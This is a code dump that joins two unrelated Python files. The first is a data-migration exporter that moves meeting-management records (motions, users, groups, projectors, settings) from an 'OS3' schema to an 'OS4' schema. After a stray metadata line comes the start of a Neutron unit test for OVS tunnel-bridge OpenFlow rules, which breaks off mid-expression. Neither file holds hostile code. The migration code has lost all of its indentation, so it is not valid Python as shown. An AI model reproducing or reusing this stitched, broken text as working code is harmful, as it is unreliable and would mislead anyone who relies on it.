def migrate_motion_workflows(self):
for old in self.get_collection("motions/workflow"):
new = copy(
old,
"id",
"name",
"first_state_id",
)
new["state_ids"] = old["states_id"]
first_state = self.get_model("motion_state", old["first_state_id"])
first_state["first_state_of_workflow_id"] = old["id"]
# the following three will be set when migrating the meeting.
new["default_workflow_meeting_id"] = None
new["default_amendment_workflow_meeting_id"] = None
new["default_statute_amendment_workflow_meeting_id"] = None
new["meeting_id"] = 1
self.set_model("motion_workflow", new)
def migrate_projector_messages(self):
for old in self.get_collection("core/projector-message"):
new = copy(
old,
"id",
"message",
)
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("projector_message", new)
def migrate_projector_countdowns(self):
for old in self.get_collection("core/countdown"):
new = copy(
old,
"id",
"title",
"description",
"default_time",
"countdown_time",
"running",
)
new["used_as_list_of_speaker_countdown_meeting_id"] = None
new["used_as_poll_countdown_meeting_id"] = None
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("projector_countdown", new)
        # Create two new countdowns: a list-of-speakers (LOS) countdown and a poll countdown
max_countdown_id = max_or_zero(
x["id"] for x in self.iter_collection("projector_countdown")
)
los_countdown = {
"id": max_countdown_id + 1,
"title": "list of speakers countdown",
"description": "created at the migration from OS3 to OS4",
"default_time": 60,
"countdown_time": 60,
"running": False,
"used_as_list_of_speaker_countdown_meeting_id": 1,
"used_as_poll_countdown_meeting_id": None,
"projection_ids": [],
"meeting_id": 1,
}
self.set_model("projector_countdown", los_countdown)
self.meeting["list_of_speakers_countdown_id"] = max_countdown_id + 1
poll_countdown = {
"id": max_countdown_id + 2,
"title": "poll countdown",
"description": "created at the migration from OS3 to OS4",
"default_time": 60,
"countdown_time": 60,
"running": False,
"used_as_list_of_speaker_countdown_meeting_id": None,
"used_as_poll_countdown_meeting_id": 1,
"projection_ids": [],
"meeting_id": 1,
}
self.set_model("projector_countdown", poll_countdown)
self.meeting["poll_countdown_id"] = max_countdown_id + 2
def migrate_personal_notes(self):
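        # OS3 stored all of a user's notes in one model as a nested dict
        # (collection -> id -> note); OS4 has one personal_note model per
        # motion, so new ids are assigned freshly via id_counter.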
id_counter = 1
for old in self.get_collection("users/personal-note"):
notes = old.get("notes", {}).get("motions/motion", {})
for motion_id, note in notes.items():
motion_id = int(motion_id)
new = {
"id": id_counter,
"user_id": old["user_id"],
"content_object_id": f"motion/{motion_id}",
"note": note["note"],
"star": note["star"],
"meeting_id": 1,
}
motion = self.get_model("motion", motion_id)
motion["personal_note_ids"].append(id_counter)
self.set_model("personal_note", new)
id_counter += 1
def migrate_users(self):
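        # Besides the plain field copy, most of the work here is filling the
        # per-meeting template fields and the reverse relations into the
        # collections migrated earlier (speakers, notes, motions, polls, ...).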
for old in self.get_collection("users/user"):
new = copy(
old,
"id",
"username",
"title",
"first_name",
"last_name",
"is_active",
"default_password",
"gender",
"email",
)
new["is_physical_person"] = not old["is_committee"]
new["password"] = ""
new["default_number"] = old["number"]
new["default_structure_level"] = old["structure_level"]
new["default_vote_weight"] = old["vote_weight"]
new["last_email_send"] = to_unix_time(old["last_email_send"])
new["is_demo_user"] = is_demo_mode and old["id"] in demo_mode_users
new["organization_management_level"] = None
new["is_present_in_meeting_ids"] = []
if old["is_present"]:
new["is_present_in_meeting_ids"].append(1)
new["committee_ids"] = []
new["committee_$_management_level"] = []
new["comment_$"] = []
new["number_$"] = []
new["structure_level_$"] = []
new["about_me_$"] = []
new["vote_weight_$"] = []
group_ids = old["groups_id"] or [
1
            ]  # explicitly put users in the default group if they do not have a group.
self.set_template(new, "group_$_ids", group_ids)
# check for permission
new["can_change_own_password"] = False
for group_id in group_ids:
group = self.get_old_model("users/group", group_id)
if group_id == 2 or "users.can_change_password" in group["permissions"]:
new["can_change_own_password"] = True
break
self.set_template(
new,
"speaker_$_ids",
[
x["id"]
for x in self.iter_collection("speaker")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"personal_note_$_ids",
[
x["id"]
for x in self.iter_collection("personal_note")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"supported_motion_$_ids",
[
x["id"]
for x in self.iter_collection("motion")
if old["id"] in x["supporter_ids"]
],
)
self.set_template(
new,
"submitted_motion_$_ids",
[
x["id"]
for x in self.iter_collection("motion_submitter")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"poll_voted_$_ids",
[
x["id"]
for x in self.iter_collection("poll")
if old["id"] in x["voted_ids"]
],
)
self.set_template(
new,
"option_$_ids",
[
x["id"]
for x in self.iter_collection("option")
if f"user/{old['id']}" == x["content_object_id"]
],
)
self.set_template(
new,
"vote_$_ids",
[
x["id"]
for x in self.iter_collection("vote")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"vote_delegated_vote_$_ids",
[
x["id"]
for x in self.iter_collection("vote")
if old["id"] == x["delegated_user_id"]
],
)
self.set_template(
new,
"assignment_candidate_$_ids",
[
x["id"]
for x in self.iter_collection("assignment_candidate")
if old["id"] == x["user_id"]
],
)
new["projection_$_ids"] = []
self.set_template(
new, "vote_delegated_$_to_id", old["vote_delegated_to_id"]
)
self.set_template(
new, "vote_delegations_$_from_ids", old["vote_delegated_from_users_id"]
)
new["meeting_ids"] = [1]
self.set_model("user", new)
def set_template(self, obj, field, value):
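        # OS4 "template fields" contain a "$": the base field (e.g.
        # "group_$_ids") lists the active replacements, and one resolved field
        # per replacement (e.g. "group_$1_ids") holds the actual values. All
        # data is migrated into meeting 1, so "1" is the only replacement.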
if value:
obj[field] = ["1"]
parts = field.split("$")
obj[f"{parts[0]}$1{parts[1]}"] = value
else:
obj[field] = []
def migrate_groups(self):
        # Important: run after migrate_users, since the reverse relation to users depends on it.
for old in self.get_collection("users/group"):
new = copy(old, "id", "name")
new["permissions"] = self.migrate_permissions(old["permissions"])
new["user_ids"] = [
x["id"]
for x in self.iter_collection("user")
if old["id"] in x["group_$1_ids"]
]
new["default_group_for_meeting_id"] = (
1 if old["id"] == 1 else None
) # default group
new["admin_group_for_meeting_id"] = (
1 if old["id"] == 2 else None
) # admin group
new["mediafile_access_group_ids"] = [
x["id"]
for x in self.iter_collection("mediafile")
if old["id"] in x["access_group_ids"]
]
new["mediafile_inherited_access_group_ids"] = [
x["id"]
for x in self.iter_collection("mediafile")
if old["id"] in x["inherited_access_group_ids"]
]
new["read_comment_section_ids"] = [
x["id"]
for x in self.iter_collection("motion_comment_section")
if old["id"] in x["read_group_ids"]
]
new["write_comment_section_ids"] = [
x["id"]
for x in self.iter_collection("motion_comment_section")
if old["id"] in x["write_group_ids"]
]
new["read_chat_group_ids"] = [
x["id"]
for x in self.iter_collection("chat_group")
if old["id"] in x["read_group_ids"]
]
new["write_chat_group_ids"] = [
x["id"]
for x in self.iter_collection("chat_group")
if old["id"] in x["write_group_ids"]
]
new["poll_ids"] = [
x["id"]
for x in self.iter_collection("poll")
if old["id"] in x["entitled_group_ids"]
]
new[
"used_as_motion_poll_default_id"
] = None # Next 3 are set by meeting migrations
new["used_as_assignment_poll_default_id"] = None
new["used_as_poll_default_id"] = None
new["meeting_id"] = 1
self.set_model("group", new)
self.meeting["default_group_id"] = 1
self.meeting["admin_group_id"] = 2
def migrate_permissions(self, perms):
# Note that poll.can_manage is not added to any group since
# stand-alone polls do not exist in OS3.
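        # Translate OS3 permission strings to their OS4 names, then drop any
        # permission that is already implied by another one the group holds
        # (PERMISSION_HIERARCHIE maps a permission to the ones it includes).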
perms = [
PERMISSION_MAPPING[x] for x in perms if PERMISSION_MAPPING[x] is not None
]
new_perms = set(perms)
for perm in perms:
new_perms -= set(PERMISSION_HIERARCHIE.get(perm, []))
return list(new_perms)
def migrate_projectors(self):
self.projection_id_counter = 1
for old in self.get_collection("core/projector"):
new = copy(
old,
"id",
"name",
"scale",
"scroll",
"width",
"aspect_ratio_numerator",
"aspect_ratio_denominator",
"color",
"background_color",
"header_background_color",
"header_font_color",
"header_h1_color",
"chyron_background_color",
"chyron_font_color",
"show_header_footer",
"show_title",
"show_logo",
)
new["show_clock"] = False
new["current_projection_ids"] = []
new["preview_projection_ids"] = []
new["history_projection_ids"] = []
for i, element in enumerate(old["elements"]):
if element["name"] == "core/clock":
new["show_clock"] = True
continue
projection_id = self.create_projection_from_projector_element(
element, i + 1, "current", old["id"]
)
new["current_projection_ids"].append(projection_id)
for i, element in enumerate(old["elements_preview"]):
projection_id = self.create_projection_from_projector_element(
element, i + 1, "preview", old["id"]
)
new["preview_projection_ids"].append(projection_id)
flat_history = [
item for sublist in old["elements_history"] for item in sublist
]
            for i, element in enumerate(flat_history):
projection_id = self.create_projection_from_projector_element(
element, i + 1, "history", old["id"]
)
new["history_projection_ids"].append(projection_id)
if old["reference_projector_id"] == old["id"]:
self.meeting["reference_projector_id"] = old["id"]
new["used_as_reference_projector_meeting_id"] = 1
else:
new["used_as_reference_projector_meeting_id"] = None
new[
"used_as_default_$_in_meeting_id"
] = [] # will be filled when migrating the meeting
new["meeting_id"] = 1
self.set_model("projector", new)
def create_projection_from_projector_element(
self, element, weight, type, projector_id
):
"""type can be "current", "preview" or "history" """
projection = {
"id": self.projection_id_counter,
"stable": element.get("stable", True),
"weight": weight,
"options": {},
"current_projector_id": None,
"preview_projector_id": None,
"history_projector_id": None,
"meeting_id": 1,
}
projection[f"{type}_projector_id"] = projector_id
for k, v in element.items():
if k not in ("id", "name", "stable"):
projection["options"][k] = v
collection = element["name"]
if collection in COLLECTION_MAPPING:
id = self.to_new_id(collection, element["id"])
collection = COLLECTION_MAPPING[collection]
projection["content_object_id"] = f"{collection}/{id}"
projection["type"] = None
elif collection == "agenda/item-list":
collection = "meeting"
id = 1
projection["content_object_id"] = "meeting/1"
projection["type"] = "agenda_item_list"
elif collection in (
"agenda/current-list-of-speakers",
"agenda/current-list-of-speakers-overlay",
):
collection = "meeting"
id = 1
projection["content_object_id"] = "meeting/1"
projection["type"] = "current_list_of_speakers"
elif collection == "agenda/current-speaker-chyron":
collection = "meeting"
id = 1
projection["content_object_id"] = "meeting/1"
projection["type"] = "current_speaker_chyron"
else:
raise OS4ExporterException(f"Unknown slide {collection}")
if collection != "user":
content_object = self.get_model(collection, id)
content_object["projection_ids"].append(projection["id"])
else:
user = self.get_model(collection, id)
if not user["projection_$_ids"]:
user["projection_$_ids"] = ["1"]
user["projection_$1_ids"] = []
user["projection_$1_ids"].append(projection["id"])
self.projection_id_counter += 1
self.set_model("projection", projection)
return projection["id"]
def migrate_meeting(self):
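        # OS3 kept meeting-wide settings as key/value pairs in core/config;
        # OS4 stores them as plain fields on the meeting model. The mapping
        # below is mostly 1:1, with renames and a few inverted booleans.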
configs = {
config["key"]: config["value"]
for config in self.get_collection("core/config")
}
self.meeting["welcome_title"] = configs["general_event_welcome_title"]
self.meeting["welcome_text"] = configs["general_event_welcome_text"]
self.meeting["name"] = configs["general_event_name"]
self.meeting["description"] = configs["general_event_description"]
self.meeting["location"] = configs["general_event_location"]
self.meeting[
"start_time"
] = 0 # Since it is a freehand field in OS3, it cannot be parsed
self.meeting["end_time"] = 0
self.meeting["jitsi_domain"] = getattr(settings, "JITSI_DOMAIN", None)
self.meeting["jitsi_room_name"] = getattr(settings, "JITSI_ROOM_NAME", None)
self.meeting["jitsi_room_password"] = getattr(
settings, "JITSI_ROOM_PASSWORD", None
)
self.meeting["enable_chat"] = getattr(settings, "ENABLE_CHAT", False)
self.meeting["imported_at"] = None
self.meeting["url_name"] = None
self.meeting["template_for_committee_id"] = None
self.meeting["enable_anonymous"] = configs["general_system_enable_anonymous"]
self.meeting["custom_translations"] = configs["translations"]
self.meeting["conference_show"] = configs["general_system_conference_show"]
self.meeting["conference_auto_connect"] = configs[
"general_system_conference_auto_connect"
]
self.meeting["conference_los_restriction"] = configs[
"general_system_conference_los_restriction"
]
self.meeting["conference_stream_url"] = configs["general_system_stream_url"]
self.meeting["conference_stream_poster_url"] = configs[
"general_system_stream_poster"
]
self.meeting["conference_open_microphone"] = configs[
"general_system_conference_open_microphone"
]
self.meeting["conference_open_video"] = configs[
"general_system_conference_open_video"
]
self.meeting["conference_auto_connect_next_speakers"] = configs[
"general_system_conference_auto_connect_next_speakers"
]
# TODO: missing setting in OS4
# self.meeting["conference_enable_helpdesk"] = configs["general_system_conference_enable_helpdesk"]
self.meeting["projector_countdown_default_time"] = configs[
"projector_default_countdown"
]
self.meeting["projector_countdown_warning_time"] = configs[
"agenda_countdown_warning_time"
]
self.meeting["export_csv_encoding"] = configs["general_csv_encoding"]
self.meeting["export_csv_separator"] = configs["general_csv_separator"]
self.meeting["export_pdf_pagenumber_alignment"] = configs[
"general_export_pdf_pagenumber_alignment"
]
self.meeting["export_pdf_fontsize"] = int(
configs["general_export_pdf_fontsize"]
)
self.meeting["export_pdf_pagesize"] = configs["general_export_pdf_pagesize"]
self.meeting["agenda_show_subtitles"] = configs["agenda_show_subtitle"]
self.meeting["agenda_enable_numbering"] = configs["agenda_enable_numbering"]
prefix = configs["agenda_number_prefix"]
self.meeting["agenda_number_prefix"] = (
prefix if len(prefix) <= 20 else prefix[0:20]
)
self.meeting["agenda_numeral_system"] = configs["agenda_numeral_system"]
self.meeting["agenda_item_creation"] = configs["agenda_item_creation"]
self.meeting["agenda_new_items_default_visibility"] = {
"1": "common",
"2": "internal",
"3": "hidden",
}[configs["agenda_new_items_default_visibility"]]
self.meeting["agenda_show_internal_items_on_projector"] = not configs[
"agenda_hide_internal_items_on_projector"
]
self.meeting["list_of_speakers_amount_last_on_projector"] = configs[
"agenda_show_last_speakers"
]
self.meeting["list_of_speakers_amount_next_on_projector"] = configs[
"agenda_show_next_speakers"
]
self.meeting["list_of_speakers_couple_countdown"] = configs[
"agenda_couple_countdown_and_speakers"
]
self.meeting["list_of_speakers_show_amount_of_speakers_on_slide"] = not configs[
"agenda_hide_amount_of_speakers"
]
self.meeting["list_of_speakers_present_users_only"] = configs[
"agenda_present_speakers_only"
]
self.meeting["list_of_speakers_show_first_contribution"] = configs[
"agenda_show_first_contribution"
]
self.meeting["list_of_speakers_enable_point_of_order_speakers"] = configs[
"agenda_enable_point_of_order_speakers"
]
self.meeting["list_of_speakers_enable_pro_contra_speech"] = configs[
"agenda_list_of_speakers_enable_pro_contra_speech"
]
self.meeting["list_of_speakers_can_set_contribution_self"] = configs[
"agenda_list_of_speakers_can_set_mark_self"
]
self.meeting["list_of_speakers_speaker_note_for_everyone"] = configs[
"agenda_list_of_speakers_speaker_note_for_everyone"
]
self.meeting["list_of_speakers_initially_closed"] = configs[
"agenda_list_of_speakers_initially_closed"
]
workflow_id = int(configs["motions_workflow"])
workflow = self.get_model("motion_workflow", workflow_id)
workflow["default_workflow_meeting_id"] = 1
self.meeting["motions_default_workflow_id"] = workflow_id
workflow_id = int(configs["motions_amendments_workflow"])
workflow = self.get_model("motion_workflow", workflow_id)
workflow["default_amendment_workflow_meeting_id"] = 1
self.meeting["motions_default_amendment_workflow_id"] = workflow_id
workflow_id = int(configs["motions_statute_amendments_workflow"])
workflow = self.get_model("motion_workflow", workflow_id)
workflow["default_statute_amendment_workflow_meeting_id"] = 1
self.meeting["motions_default_statute_amendment_workflow_id"] = workflow_id
self.meeting["motions_preamble"] = configs["motions_preamble"]
self.meeting["motions_default_line_numbering"] = configs[
"motions_default_line_numbering"
]
self.meeting["motions_line_length"] = configs["motions_line_length"]
self.meeting["motions_reason_required"] = configs["motions_reason_required"]
self.meeting["motions_enable_text_on_projector"] = not configs[
"motions_disable_text_on_projector"
]
self.meeting["motions_enable_reason_on_projector"] = not configs[
"motions_disable_reason_on_projector"
]
self.meeting["motions_enable_sidebox_on_projector"] = not configs[
"motions_disable_sidebox_on_projector"
]
self.meeting["motions_enable_recommendation_on_projector"] = not configs[
"motions_disable_recommendation_on_projector"
]
self.meeting["motions_show_referring_motions"] = not configs[
"motions_hide_referring_motions"
]
self.meeting["motions_show_sequential_number"] = configs[
"motions_show_sequential_numbers"
]
self.meeting["motions_recommendations_by"] = configs[
"motions_recommendations_by"
]
self.meeting["motions_statute_recommendations_by"] = configs[
"motions_statute_recommendations_by"
]
self.meeting["motions_recommendation_text_mode"] = configs[
"motions_recommendation_text_mode"
]
self.meeting["motions_default_sorting"] = configs["motions_motions_sorting"]
self.meeting["motions_number_type"] = configs["motions_identifier"]
self.meeting["motions_number_min_digits"] = configs[
"motions_identifier_min_digits"
]
self.meeting["motions_number_with_blank"] = configs[
"motions_identifier_with_blank"
]
self.meeting["motions_statutes_enabled"] = configs["motions_statutes_enabled"]
self.meeting["motions_amendments_enabled"] = configs[
"motions_amendments_enabled"
]
self.meeting["motions_amendments_in_main_list"] = configs[
"motions_amendments_main_table"
]
self.meeting["motions_amendments_of_amendments"] = configs[
"motions_amendments_of_amendments"
]
self.meeting["motions_amendments_prefix"] = configs["motions_amendments_prefix"]
self.meeting["motions_amendments_text_mode"] = configs[
"motions_amendments_text_mode"
]
self.meeting["motions_amendments_multiple_paragraphs"] = configs[
"motions_amendments_multiple_paragraphs"
]
self.meeting["motions_supporters_min_amount"] = configs[
"motions_min_supporters"
]
self.meeting["motions_export_title"] = configs["motions_export_title"]
self.meeting["motions_export_preamble"] = configs["motions_export_preamble"]
self.meeting["motions_export_submitter_recommendation"] = configs[
"motions_export_submitter_recommendation"
]
self.meeting["motions_export_follow_recommendation"] = configs[
"motions_export_follow_recommendation"
]
self.meeting["motion_poll_ballot_paper_selection"] = configs[
"motions_pdf_ballot_papers_selection"
]
self.meeting["motion_poll_ballot_paper_number"] = configs[
"motions_pdf_ballot_papers_number"
]
self.meeting["motion_poll_default_type"] = configs["motion_poll_default_type"]
self.meeting["motion_poll_default_100_percent_base"] = configs[
"motion_poll_default_100_percent_base"
]
self.meeting["motion_poll_default_majority_method"] = configs[
"motion_poll_default_majority_method"
]
group_ids = configs["motion_poll_default_groups"]
for group_id in group_ids:
group = self.get_model("group", group_id)
group["used_as_motion_poll_default_id"] = 1
self.meeting["motion_poll_default_group_ids"] = group_ids
self.meeting["users_sort_by"] = configs["users_sort_by"]
self.meeting["users_enable_presence_view"] = configs[
"users_enable_presence_view"
]
self.meeting["users_enable_vote_weight"] = configs["users_activate_vote_weight"]
self.meeting["users_allow_self_set_present"] = configs[
"users_allow_self_set_present"
]
self.meeting["users_pdf_welcometitle"] = configs["users_pdf_welcometitle"]
self.meeting["users_pdf_welcometext"] = configs["users_pdf_welcometext"]
self.meeting["users_pdf_url"] = configs["users_pdf_url"]
self.meeting["users_pdf_wlan_ssid"] = configs["users_pdf_wlan_ssid"]
self.meeting["users_pdf_wlan_password"] = configs["users_pdf_wlan_password"]
self.meeting["users_pdf_wlan_encryption"] = configs["users_pdf_wlan_encryption"]
self.meeting["users_email_sender"] = configs["users_email_sender"]
self.meeting["users_email_replyto"] = configs["users_email_replyto"]
self.meeting["users_email_subject"] = configs["users_email_subject"]
self.meeting["users_email_body"] = configs["users_email_body"]
self.meeting["assignments_export_title"] = configs["assignments_pdf_title"]
self.meeting["assignments_export_preamble"] = configs[
"assignments_pdf_preamble"
]
self.meeting["assignment_poll_ballot_paper_selection"] = configs[
"assignments_pdf_ballot_papers_selection"
]
self.meeting["assignment_poll_ballot_paper_number"] = configs[
"assignments_pdf_ballot_papers_number"
]
self.meeting["assignment_poll_add_candidates_to_list_of_speakers"] = configs[
"assignment_poll_add_candidates_to_list_of_speakers"
]
self.meeting["assignment_poll_sort_poll_result_by_votes"] = configs[
"assignment_poll_sort_poll_result_by_votes"
]
self.meeting["assignment_poll_default_type"] = configs[
"assignment_poll_default_type"
]
self.meeting["assignment_poll_default_method"] = configs[
"assignment_poll_method"
]
self.meeting["assignment_poll_default_100_percent_base"] = configs[
"assignment_poll_default_100_percent_base"
]
self.meeting["assignment_poll_default_majority_method"] = configs[
"assignment_poll_default_majority_method"
]
group_ids = configs["assignment_poll_default_groups"]
for group_id in group_ids:
group = self.get_model("group", group_id)
group["used_as_assignment_poll_default_id"] = 1
self.meeting["assignment_poll_default_group_ids"] = group_ids
self.meeting["poll_ballot_paper_selection"] = "CUSTOM_NUMBER"
self.meeting["poll_ballot_paper_number"] = 8
self.meeting["poll_sort_poll_result_by_votes"] = True
self.meeting["poll_default_type"] = "analog"
self.meeting["poll_default_method"] = "Y"
self.meeting["poll_default_100_percent_base"] = "YNA"
self.meeting["poll_default_majority_method"] = "simple"
self.meeting["poll_default_group_ids"] = []
self.meeting["poll_couple_countdown"] = True
for collection in (
"projector",
"projector_message",
"projector_countdown",
"tag",
"agenda_item",
"list_of_speakers",
"speaker",
"topic",
"group",
"mediafile",
"motion",
"motion_comment_section",
"motion_category",
"motion_block",
"motion_workflow",
"motion_statute_paragraph",
"motion_comment",
"motion_submitter",
"motion_change_recommendation",
"motion_state",
"poll",
"option",
"vote",
"assignment",
"assignment_candidate",
"personal_note",
"chat_group",
):
self.meeting[f"{collection}_ids"] = [
x["id"] for x in self.iter_collection(collection)
]
self.meeting["all_projection_ids"] = [
x["id"] for x in self.iter_collection("projection")
]
# projection_ids was set when creating self.meeting
self.migrate_logos_and_fonts(configs, "logo")
self.migrate_logos_and_fonts(configs, "font")
self.meeting["committee_id"] = None
self.meeting["default_meeting_for_committee_id"] = None
self.meeting["organization_tag_ids"] = []
self.meeting["present_user_ids"] = [
x["id"]
for x in self.iter_collection("user")
if 1 in x["is_present_in_meeting_ids"]
]
self.meeting["user_ids"] = [x["id"] for x in self.iter_collection("user")]
# reference_projector_id is set by the projector migration
# list_of_speakers_countdown_id and poll_countdown_id are set by the countdown migration
self.meeting["default_projector_$_id"] = []
for pd in self.get_collection("core/projection-default"):
name = PROJECTION_DEFAULT_NAME_MAPPING[pd["name"]]
projector = self.get_model("projector", pd["projector_id"])
projector["used_as_default_$_in_meeting_id"].append(name)
projector[f"used_as_default_${name}_in_meeting_id"] = 1
self.meeting["default_projector_$_id"].append(name)
self.meeting[f"default_projector_${name}_id"] = pd["projector_id"]
# Add "poll"
projector_id = self.meeting["projector_ids"][0] # get an arbitrary projector id
projector = self.get_model("projector", projector_id)
projector["used_as_default_$_in_meeting_id"].append("poll")
projector["used_as_default_$poll_in_meeting_id"] = 1
self.meeting["default_projector_$_id"].append("poll")
self.meeting["default_projector_$poll_id"] = projector_id
# default_group_id and admin_group_id are set by the group migration
def migrate_logos_and_fonts(self, configs, type):
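        # OS3 referenced logos/fonts by URL path in the config; resolve each
        # path back to its mediafile and wire up the template fields in both
        # directions (meeting -> mediafile and mediafile -> meeting).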
self.meeting[f"{type}_$_id"] = []
for place in configs[f"{type}s_available"]:
path = configs[place].get("path", "")
if not path:
continue
# find mediafile
mediafile_id = None
for m in self.get_collection("mediafiles/mediafile"):
m_path = m["media_url_prefix"] + m["path"]
if m_path == path:
mediafile_id = m["id"]
break
if not mediafile_id:
continue
replacement = place.split("_", 2)[1]
mediafile = self.get_model("mediafile", mediafile_id)
mediafile[f"used_as_{type}_$_in_meeting_id"].append(replacement)
mediafile[f"used_as_{type}_${replacement}_in_meeting_id"] = 1
self.meeting[f"{type}_$_id"].append(replacement)
self.meeting[f"{type}_${replacement}_id"] = mediafile_id
| mit | 812,854,984,259,115,900 | 38.708046 | 115 | 0.528267 | false |
apporc/neutron | neutron/tests/unit/plugins/ml2/drivers/openvswitch/agent/openflow/native/test_br_tun.py | 18 | 19192 | # Copyright (C) 2014,2015 VA Linux Systems Japan K.K.
# Copyright (C) 2014,2015 YAMAMOTO Takashi <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import neutron.plugins.ml2.drivers.openvswitch.agent.common.constants \
as ovs_const
from neutron.tests.unit.plugins.ml2.drivers.openvswitch.agent.openflow.native \
import ovs_bridge_test_base
call = mock.call # short hand
class OVSTunnelBridgeTest(ovs_bridge_test_base.OVSBridgeTestBase,
ovs_bridge_test_base.OVSDVRProcessTestMixin):
dvr_process_table_id = ovs_const.DVR_PROCESS
dvr_process_next_table_id = ovs_const.PATCH_LV_TO_TUN
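    # The table ids asserted below correspond to the br-tun pipeline constants
    # in ovs_const (roughly: 0 local switching, 2 patch-port dispatch, 3/4/6
    # tunnel-type to local vlan, 10 MAC learning, 20 known unicast, 21 ARP
    # responder, 22 flood).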
def setUp(self):
super(OVSTunnelBridgeTest, self).setUp()
self.setup_bridge_mock('br-tun', self.br_tun_cls)
def test_setup_default_table(self):
patch_int_ofport = 5555
arp_responder_enabled = False
self.br.setup_default_table(patch_int_ofport=patch_int_ofport,
arp_responder_enabled=arp_responder_enabled)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=2)],
match=ofpp.OFPMatch(in_port=patch_int_ofport),
priority=1, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=20)],
match=ofpp.OFPMatch(
eth_dst=('00:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(
eth_dst=('01:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=3)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=4)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=6)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.NXActionLearn(
cookie=0,
hard_timeout=300,
priority=1,
specs=[
ofpp.NXFlowSpecMatch(
dst=('vlan_vid', 0),
n_bits=12,
src=('vlan_vid', 0)),
ofpp.NXFlowSpecMatch(
dst=('eth_dst', 0),
n_bits=48,
src=('eth_src', 0)),
ofpp.NXFlowSpecLoad(
dst=('vlan_vid', 0),
n_bits=12,
src=0),
ofpp.NXFlowSpecLoad(
dst=('tunnel_id', 0),
n_bits=64,
src=('tunnel_id', 0)),
ofpp.NXFlowSpecOutput(
dst='',
n_bits=32,
src=('in_port', 0)),
],
table_id=20),
ofpp.OFPActionOutput(patch_int_ofport, 0),
]),
],
match=ofpp.OFPMatch(),
priority=1,
table_id=10)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(),
priority=0,
table_id=20)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0,
table_id=22))
]
self.assertEqual(expected, self.mock.mock_calls)
def test_setup_default_table_arp_responder_enabled(self):
patch_int_ofport = 5555
arp_responder_enabled = True
self.br.setup_default_table(patch_int_ofport=patch_int_ofport,
arp_responder_enabled=arp_responder_enabled)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=2)],
match=ofpp.OFPMatch(in_port=patch_int_ofport),
priority=1, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=21)],
match=ofpp.OFPMatch(
eth_dst='ff:ff:ff:ff:ff:ff',
eth_type=self.ether_types.ETH_TYPE_ARP),
priority=1,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=20)],
match=ofpp.OFPMatch(
eth_dst=('00:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(
eth_dst=('01:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=3)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=4)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=6)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.NXActionLearn(
cookie=0,
hard_timeout=300,
priority=1,
specs=[
ofpp.NXFlowSpecMatch(
dst=('vlan_vid', 0),
n_bits=12,
src=('vlan_vid', 0)),
ofpp.NXFlowSpecMatch(
dst=('eth_dst', 0),
n_bits=48,
src=('eth_src', 0)),
ofpp.NXFlowSpecLoad(
dst=('vlan_vid', 0),
n_bits=12,
src=0),
ofpp.NXFlowSpecLoad(
dst=('tunnel_id', 0),
n_bits=64,
src=('tunnel_id', 0)),
ofpp.NXFlowSpecOutput(
dst='',
